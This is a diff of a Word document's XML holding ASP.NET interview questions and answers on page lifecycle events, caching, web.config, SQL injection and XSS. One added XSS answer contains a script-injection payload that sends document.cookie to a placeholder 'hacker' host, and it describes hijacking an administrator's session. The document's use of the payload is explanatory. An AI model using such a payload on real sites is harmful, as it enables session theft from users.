+        <w:t xml:space="preserve">20).What are the advantages and disadvantages of </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3356,15 +3211,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">: View state is nothing but a method that the ASP.NET </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>use</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to preserve page and control values between </w:t>
+        <w:t xml:space="preserve">: View state is nothing but a method that the ASP.NET use to preserve page and control values between </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4034,7 +3881,7 @@
           <w:bottom w:w="15" w:type="dxa"/>
           <w:right w:w="15" w:type="dxa"/>
         </w:tblCellMar>
-        <w:tblLook w:val="04A0"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="2250"/>
@@ -4124,21 +3971,12 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>Raised</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> after the start stage is complete and before the initialization stage begins. Use this event for the following:</w:t>
+              <w:t>Raised after the start stage is complete and before the initialization stage begins. Use this event for the following:</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4415,21 +4253,12 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>Raised</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> after all controls have been initialized and any skin settings have been applied. The </w:t>
+              <w:t xml:space="preserve">Raised after all controls have been initialized and any skin settings have been applied. The </w:t>
             </w:r>
             <w:hyperlink r:id="rId12" w:history="1">
               <w:r>
@@ -4530,25 +4359,16 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>Raised</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> at the end of the page's initialization stage. Only one operation takes place between the </w:t>
+              <w:t xml:space="preserve">Raised at the end of the page's initialization stage. Only one operation takes place between the </w:t>
             </w:r>
             <w:hyperlink r:id="rId15" w:history="1">
+              <w:proofErr w:type="spellStart"/>
               <w:r>
                 <w:rPr>
                   <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
@@ -4559,6 +4379,7 @@
                 </w:rPr>
                 <w:t>Init</w:t>
               </w:r>
+              <w:proofErr w:type="spellEnd"/>
             </w:hyperlink>
             <w:r>
               <w:rPr>
@@ -5126,7 +4947,7 @@
                           <a:blip r:embed="rId32" cstate="print">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns="" val="0"/>
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                               </a:ext>
                             </a:extLst>
                           </a:blip>
@@ -5194,25 +5015,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve"> request, if the page contains </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>validator</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> controls, check the </w:t>
+              <w:t xml:space="preserve"> request, if the page contains validator controls, check the </w:t>
             </w:r>
             <w:hyperlink r:id="rId33" w:history="1">
               <w:proofErr w:type="spellStart"/>
@@ -5303,21 +5106,12 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>Raised</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> at the end of the event-handling stage.</w:t>
+              <w:t>Raised at the end of the event-handling stage.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5381,21 +5175,12 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>Raised</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> after the </w:t>
+              <w:t xml:space="preserve">Raised after the </w:t>
             </w:r>
             <w:hyperlink r:id="rId37" w:history="1">
               <w:r>
@@ -5758,21 +5543,12 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>Raised</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> after view state and control state have been saved for the page and for all controls. Any changes to the page or controls at this point affect rendering, but the changes will not be retrieved on the next </w:t>
+              <w:t xml:space="preserve">Raised after view state and control state have been saved for the page and for all controls. Any changes to the page or controls at this point affect rendering, but the changes will not be retrieved on the next </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
@@ -6059,7 +5835,6 @@
           <w:rFonts w:eastAsia="Times New Roman"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Heading2Char"/>
@@ -6074,7 +5849,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> in ASP.NET?</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -6159,11 +5933,9 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>Page Output Cache Vs Partial Page Cache Vs Application Data Cache in ASP.NET?</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -6190,13 +5962,8 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">For Partial Page Cache (also known as Page Fragment Cache), a part or fragment of a web page is stored in Cache as opposed to complete page caching for Page Output Cache. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>For example, caching a user control on a web page that displays product categories using Page Fragment Cache.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>For Partial Page Cache (also known as Page Fragment Cache), a part or fragment of a web page is stored in Cache as opposed to complete page caching for Page Output Cache. For example, caching a user control on a web page that displays product categories using Page Fragment Cache.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -6703,15 +6470,7 @@
         <w:pStyle w:val="NoSpacing"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">On the first request, the output is </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>cached,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> subsequent requests for the 60 second duration use the cached page instead of generating the html again. If this control is database intensive, then all subsequent requests for the 60 second duration saved database calls, etc, and the page load for the subsequent requests should be much faster.</w:t>
+        <w:t>On the first request, the output is cached, subsequent requests for the 60 second duration use the cached page instead of generating the html again. If this control is database intensive, then all subsequent requests for the 60 second duration saved database calls, etc, and the page load for the subsequent requests should be much faster.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6746,7 +6505,6 @@
           <w:rFonts w:eastAsia="Times New Roman"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman"/>
@@ -6782,7 +6540,6 @@
         </w:rPr>
         <w:t>?</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -6848,7 +6605,7 @@
           <w:bottom w:w="15" w:type="dxa"/>
           <w:right w:w="15" w:type="dxa"/>
         </w:tblCellMar>
-        <w:tblLook w:val="04A0"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="2215"/>
@@ -8239,15 +7996,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> allows </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>to customize</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> the validation logic with respect to our application logic.</w:t>
+        <w:t xml:space="preserve"> allows to customize the validation logic with respect to our application logic.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8621,15 +8370,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> file is </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>requested,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> the ASP.NET service handler is executed. An HTTP Handler is a component that handles the ASP.NET requests at a lower level than ASP.NET is capable of handling.</w:t>
+        <w:t xml:space="preserve"> file is requested, the ASP.NET service handler is executed. An HTTP Handler is a component that handles the ASP.NET requests at a lower level than ASP.NET is capable of handling.</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -9156,12 +8897,7 @@
       <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve">&gt; is the most common </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:t xml:space="preserve">section of </w:t>
+        <w:t xml:space="preserve">&gt; is the most common section of </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -9226,15 +8962,7 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>Data Source =</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>localhost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>; Integrated Security = true"/&gt;</w:t>
+        <w:t>Data Source =localhost; Integrated Security = true"/&gt;</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -9267,7 +8995,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Q 1:- What you will do for make your code more secure?</w:t>
+        <w:t>Q 4:- What is the difference between Authentication and Authorization?</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -9283,15 +9011,11 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> I will review my code from beginning and understand the security issues that are possible in the code, after that </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> will resolve them.</w:t>
+        <w:t xml:space="preserve"> Authentication means validating users. In this step, we verify user credentials to check whether the person tying to log in is the right one or not. </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>Authorization on the other hand is keeping track of what the current user is allowed to see and what should be hidden from him.</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -9304,7 +9028,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Q 2:- How much time you will set for review, is there any time limit, if you not getting security issues?</w:t>
+        <w:t>Q 5:- What do you understand by SQL Injection attack?</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -9320,15 +9044,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> I will set reasonable time limit on my review, and then optimize my review for this limit. If I find myself spending too much time in any one area (especially if it is not a high-priority area or objective)</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>,then</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> I flag it for later review and move on.</w:t>
+        <w:t xml:space="preserve"> A SQL injection attack occurs when untrusted input can modify the logic of a SQL query in unexpected ways.</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -9341,7 +9057,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Q 3:- What you will do if you have not much time for (asp.net project) security review?</w:t>
+        <w:t>Q 6:- What you will do to prevent SQL injection?</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -9357,7 +9073,19 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> I will limit my reviews to small, manageable pieces of code. This allows me to finish quickly, stay focused, and find a larger number of security issues in the code me examining.</w:t>
+        <w:t xml:space="preserve"> I will use parameterized and typed stored procedures.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">The typed SQL parameter checks the type and length of the input, and it ensures that the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>userName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> input value is treated as a literal value and not as executable code in the database.</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -9370,77 +9098,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Q 4:- What is the difference between Authentication and Authorization?</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ans</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>:-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Authentication means validating users. In this step, we verify user credentials to check whether the person tying to log in is the right one or not. </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>Authorization on the other hand is keeping track of what the current user is allowed to see and what should be hidden from him.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
+        <w:t xml:space="preserve">Q 7:- If you are not using Stored Procedure, think you are using simple </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Q 5:- What do you understand by SQL Injection attack?</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ans</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>:-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> A SQL injection attack occurs when </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>untrusted</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> input can modify the logic of a SQL query in unexpected ways.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
+        <w:t>sqlstatment</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Q 6:- What you will do to prevent SQL injection?</w:t>
+        <w:t xml:space="preserve"> then what you will do to prevent SQL injections?</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -9456,11 +9130,19 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> I will use parameterized and typed stored procedures.</w:t>
+        <w:t xml:space="preserve"> If the code does not use stored procedures, make sure that it uses parameters in the SQL statements it constructs, as shown in the following example.</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">The typed SQL parameter checks the type and length of the input, and it ensures that the </w:t>
+        <w:t xml:space="preserve">select status from Users where </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>UserName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=@</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -9468,8 +9150,46 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> input value is treated as a literal value and not as executable code in the database.</w:t>
-      </w:r>
+        <w:br/>
+        <w:t>I will check that the code does not use the following approach, where the input is used directly to construct the executable SQL statement by using string concatenation.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">string </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "select status from Users where </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>UserName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>='"</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>txtUserName.Text</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> + "'"</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:br/>
       </w:r>
@@ -9481,326 +9201,182 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Q 7:- If you are not using Stored Procedure, think you are using simple </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Q 9:- What is Cross-site scripting (XSS)?</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ans</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>:-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>Example 1.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>For example, the HTML snippet:</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>&lt; title&gt;Example document: %(title)&lt;/title&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>is intended to illustrate a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML to be emitted to the browser:</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>&lt; title&gt;Example document: XSS Doc&lt;/title&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>"&gt;&lt;SCRIPT&gt;var+img=new+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Image(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>);img.src="http://hacker/"%20+%20document.cookie;&lt;/SCRIPT&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">Sitting on the other end, at the Webserver, you will be receiving hits where after a double space is the users cookie. You might strike lucky if an administrator clicks the link, allowing you to steal their </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sessionID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and hijack the session.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>sqlstatment</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:lastRenderedPageBreak/>
+        <w:t>Q 10:- What is the difference between Windows and Forms Authentication?</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ans</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:- Windows Authentication: is provided so that web pages</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">can make use of the local Windows User and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Groups.In</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> it windows actual login name and</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>password is used for authentication.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>Forms Authentication: Under Forms Authentication user can able to create their own</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>login name and password it is basically a cookie based</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>authentication system which stores the login name and</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>password in database file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> then what you will do to prevent SQL injections?</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ans</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>:-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> If the code does not use stored procedures, make sure that it uses parameters in the SQL statements it constructs, as shown in the following example.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">select status from Users where </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>UserName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=@</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>userName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>I will check that the code does not use the following approach, where the input is used directly to construct the executable SQL statement by using string concatenation.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">string </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = "select status from Users where </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>UserName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>='"</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>txtUserName.Text</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> + "'"</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
+        <w:t xml:space="preserve">5). Can you tell the location of the root </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Q 8:- What do you understand by XSS?</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ans</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>:-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Cross-site scripting (also known as XSS or CSS) </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
+        <w:t>web.confit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Q 9:- What is Cross-site scripting (XSS)?</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ans</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>:-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Example 1.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>For example, the HTML snippet:</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
